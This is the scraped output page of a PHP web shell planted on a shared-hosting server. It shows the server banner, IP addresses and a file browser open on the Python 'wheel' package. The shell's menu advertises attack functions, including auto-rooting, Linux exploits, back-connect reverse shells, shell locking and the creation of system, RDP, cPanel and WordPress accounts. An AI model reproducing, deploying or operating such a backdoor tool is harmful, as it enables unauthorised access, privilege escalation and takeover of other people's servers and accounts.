Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
hc_python /
lib /
python3.12 /
site-packages /
wheel /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
vendored
[ DIR ]
drwxr-xr-x
__init__.py
59
B
-rw-r--r--
__main__.py
455
B
-rw-r--r--
_bdist_wheel.py
21.19
KB
-rw-r--r--
_setuptools_logging.py
781
B
-rw-r--r--
bdist_wheel.py
1.08
KB
-rw-r--r--
macosx_libfile.py
16.18
KB
-rw-r--r--
metadata.py
6.03
KB
-rw-r--r--
util.py
423
B
-rw-r--r--
wheelfile.py
8.21
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __main__.py
""" Wheel command line tool (enable python -m wheel syntax) """ from __future__ import annotations import sys def main(): # needed for console script if __package__ == "": # To be able to run 'python wheel-0.9.whl/wheel': import os.path path = os.path.dirname(os.path.dirname(__file__)) sys.path[0:0] = [path] import wheel.cli sys.exit(wheel.cli.main()) if __name__ == "__main__": sys.exit(main())
Close